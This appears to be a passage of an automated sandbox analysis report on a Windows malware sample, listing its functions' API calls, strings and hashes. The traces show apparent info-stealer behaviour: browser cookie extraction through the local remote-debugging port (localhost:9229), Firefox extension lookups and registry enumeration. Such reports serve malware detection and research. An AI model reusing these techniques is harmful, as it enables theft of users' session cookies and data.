                            • lstrlen.KERNEL32(00D94FA0), ref: 00D819B8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D819D9
                            • lstrcat.KERNEL32(00000000,00D94FA0), ref: 00D819E5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81A14
                            • lstrlen.KERNEL32(00BF8E20), ref: 00D81A2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81A51
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81A5C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81A8B
                            • lstrlen.KERNEL32(00BF8E00), ref: 00D81AA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81AC8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81AD3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81B02
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: e1ac5b219d354db904737e92b2c1de512dc337dff35f45cc26271b0591bc572d
                            • Instruction ID: 8a1f1375aed427f52bbf84f2fd48baa10876fa392430027948ec7af5fd53bcb0
                            • Opcode Fuzzy Hash: e1ac5b219d354db904737e92b2c1de512dc337dff35f45cc26271b0591bc572d
                            • Instruction Fuzzy Hash: F1912FB56017079FDB20AFB9DC99A2677FCEF14340B18482EA896C3251DB74E946CB70
                            Function 00D74760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74793
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00D747C5
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D74812
                            • lstrlen.KERNEL32(00D94B60), ref: 00D7481D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7483A
                            • lstrcat.KERNEL32(00000000,00D94B60), ref: 00D74846
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7486B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74898
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D748A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D748CA
                            • StrStrA.SHLWAPI(?,00000000), ref: 00D748DC
                            • lstrlen.KERNEL32(?), ref: 00D748F0
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D74931
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D749B8
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D749E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74A0A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74A30
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74A5D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: c45fcf1b88c791d431d845dfe7eeb87ec1ea4c0b50946dace47f66cc0f963117
                            • Instruction ID: 5d994afc0b2b6b41552c23ead74088519663dba729a84dabffb6253ff67d590e
                            • Opcode Fuzzy Hash: c45fcf1b88c791d431d845dfe7eeb87ec1ea4c0b50946dace47f66cc0f963117
                            • Instruction Fuzzy Hash: F9B1A531A5160A9BCB22EFB8D8569AF77B5EF44300F098529F84997211EB70ED058BF1
                            Function 00D692B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D690C0: InternetOpenA.WININET(00D8CFEC,00000001,00000000,00000000,00000000), ref: 00D690DF
                              • Part of subcall function 00D690C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00D690FC
                              • Part of subcall function 00D690C0: InternetCloseHandle.WININET(00000000), ref: 00D69109
                            • strlen.MSVCRT ref: 00D692E1
                            • strlen.MSVCRT ref: 00D692FA
                              • Part of subcall function 00D68980: std::_Xinvalid_argument.LIBCPMT ref: 00D68996
                            • strlen.MSVCRT ref: 00D69399
                            • strlen.MSVCRT ref: 00D693E6
                            • lstrcat.KERNEL32(?,cookies), ref: 00D69547
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D69559
                            • lstrcat.KERNEL32(?,?), ref: 00D6956A
                            • lstrcat.KERNEL32(?,00D94B98), ref: 00D6957C
                            • lstrcat.KERNEL32(?,?), ref: 00D6958D
                            • lstrcat.KERNEL32(?,.txt), ref: 00D6959F
                            • lstrlen.KERNEL32(?), ref: 00D695B6
                            • lstrlen.KERNEL32(?), ref: 00D695DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D69614
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: aadaf602ea69d632ff25827e78d168cfcfdb53cffa03a195df4f5e8afaed5128
                            • Instruction ID: 6fab598f9d765084e5ce5a5ce0c55a733a1378ad394f2ed30b7e3f8cbd73f836
                            • Opcode Fuzzy Hash: aadaf602ea69d632ff25827e78d168cfcfdb53cffa03a195df4f5e8afaed5128
                            • Instruction Fuzzy Hash: BAE12571E11218DFDF10DFA8D890AEEBBB5BF48310F1444AAE509A7241DB70AE45CFA1
                            Function 00D7D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 00D7D9A1
                            • memset.MSVCRT ref: 00D7D9B3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7D9DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7DA0E
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7DA1C
                            • lstrcat.KERNEL32(?,00BFE1C8), ref: 00D7DA36
                            • lstrcat.KERNEL32(?,?), ref: 00D7DA4A
                            • lstrcat.KERNEL32(?,00BFCD80), ref: 00D7DA5E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7DA8E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D7DA95
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7DAFE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: f293fc10a8e50ec407c2fb06784b40dc7462ca349bfadc90c0fd3195ef5e6308
                            • Instruction ID: f0d2b1fe5f13b2832484b189f0a2639fba20a99b75b44feec224dfaad1acc8d2
                            • Opcode Fuzzy Hash: f293fc10a8e50ec407c2fb06784b40dc7462ca349bfadc90c0fd3195ef5e6308
                            • Instruction Fuzzy Hash: A9B1AF719102199FDB10EFB4CC949EE77B9FF48300F188569E91AE7250EA709E45CBB0
                            Function 00D6B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6B330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6B3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B3D9
                            • lstrlen.KERNEL32(00D94C50), ref: 00D6B450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B474
                            • lstrcat.KERNEL32(00000000,00D94C50), ref: 00D6B480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B4A9
                            • lstrlen.KERNEL32(00000000), ref: 00D6B52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6B55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B587
                            • lstrlen.KERNEL32(00D94AD4), ref: 00D6B5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B622
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D6B62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B65E
                            • lstrlen.KERNEL32(?), ref: 00D6B767
                            • lstrlen.KERNEL32(?), ref: 00D6B776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B79E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: ecc6c5d50e4fa8e803f0aa50efc141edc3c971cf08efc6b44eb141e57e8bbd51
                            • Instruction ID: bc1f15b153801abf5ed9d0115bf9a190ca18515f59df86201f54ebb425ac7642
                            • Opcode Fuzzy Hash: ecc6c5d50e4fa8e803f0aa50efc141edc3c971cf08efc6b44eb141e57e8bbd51
                            • Instruction Fuzzy Hash: 49023030A016058FCB25DF69D959A6AB7B5FF44314F1D806EE409DB362DB71DC82CBA0
                            Function 00D83760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            • RegOpenKeyExA.ADVAPI32(?,00BFB288,00000000,00020019,?), ref: 00D837BD
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D837F7
                            • wsprintfA.USER32 ref: 00D83822
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00D83840
                            • RegCloseKey.ADVAPI32(?), ref: 00D8384E
                            • RegCloseKey.ADVAPI32(?), ref: 00D83858
                            • RegQueryValueExA.ADVAPI32(?,00BFE000,00000000,000F003F,?,?), ref: 00D838A1
                            • lstrlen.KERNEL32(?), ref: 00D838B6
                            • RegQueryValueExA.ADVAPI32(?,00BFDE80,00000000,000F003F,?,00000400), ref: 00D83927
                            • RegCloseKey.ADVAPI32(?), ref: 00D83972
                            • RegCloseKey.ADVAPI32(?), ref: 00D83989
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: a08b4d37947bbad570a5a6aefbdfc5efc00c3f3fd50da71686c02a4a8e48cc56
                            • Instruction ID: 30708a0123d20ff72f12aa43b95dd5a047c74e144b9c84e212a3a2324ca49e70
                            • Opcode Fuzzy Hash: a08b4d37947bbad570a5a6aefbdfc5efc00c3f3fd50da71686c02a4a8e48cc56
                            • Instruction Fuzzy Hash: B0919F729002089FCB10EFA8DD859EEB7B9FB48710F15856AE509A7211D771EE46CFB0
                            Function 00D690C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(00D8CFEC,00000001,00000000,00000000,00000000), ref: 00D690DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00D690FC
                            • InternetCloseHandle.WININET(00000000), ref: 00D69109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 00D69166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00D69197
                            • InternetCloseHandle.WININET(00000000), ref: 00D691A2
                            • InternetCloseHandle.WININET(00000000), ref: 00D691A9
                            • strlen.MSVCRT ref: 00D691BA
                            • strlen.MSVCRT ref: 00D691ED
                            • strlen.MSVCRT ref: 00D6922E
                            • strlen.MSVCRT ref: 00D6924C
                              • Part of subcall function 00D68980: std::_Xinvalid_argument.LIBCPMT ref: 00D68996
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 11ae683e95bad0fe30866705b9529c9886d2aaebf1b00442e78a83e9d5237510
                            • Instruction ID: 5d0026084e27f8dcf62b5e6d2a40de013319b140c1997c0c03e0a11b8da46c18
                            • Opcode Fuzzy Hash: 11ae683e95bad0fe30866705b9529c9886d2aaebf1b00442e78a83e9d5237510
                            • Instruction Fuzzy Hash: A951E371600209ABEB20DBA8DC45FEEF7F9DF48714F14016AF504E7281DBB4AA4987B5
                            Function 00D81660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00D816A1
                            • lstrcpy.KERNEL32(00000000,00BEBFB0), ref: 00D816CC
                            • lstrlen.KERNEL32(?), ref: 00D816D9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D816F6
                            • lstrcat.KERNEL32(00000000,?), ref: 00D81704
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D8172A
                            • lstrlen.KERNEL32(00BFA648), ref: 00D8173F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D81762
                            • lstrcat.KERNEL32(00000000,00BFA648), ref: 00D8176A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81792
                            • ShellExecuteEx.SHELL32(?), ref: 00D817CD
                            • ExitProcess.KERNEL32 ref: 00D81803
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: b138e256b70c4dce7ba5d23e393ee7f19676df37d13d5060849ef2e1d1f6449c
                            • Instruction ID: 6e5853dc35f03af43c78eebae889f69c31a426836883afa8eaa0be7cf3a9755f
                            • Opcode Fuzzy Hash: b138e256b70c4dce7ba5d23e393ee7f19676df37d13d5060849ef2e1d1f6449c
                            • Instruction Fuzzy Hash: 98518574901619EBDB11EFB4CC84AAEB7FDEF48300F05412AE505E3251EB70AE06DB60
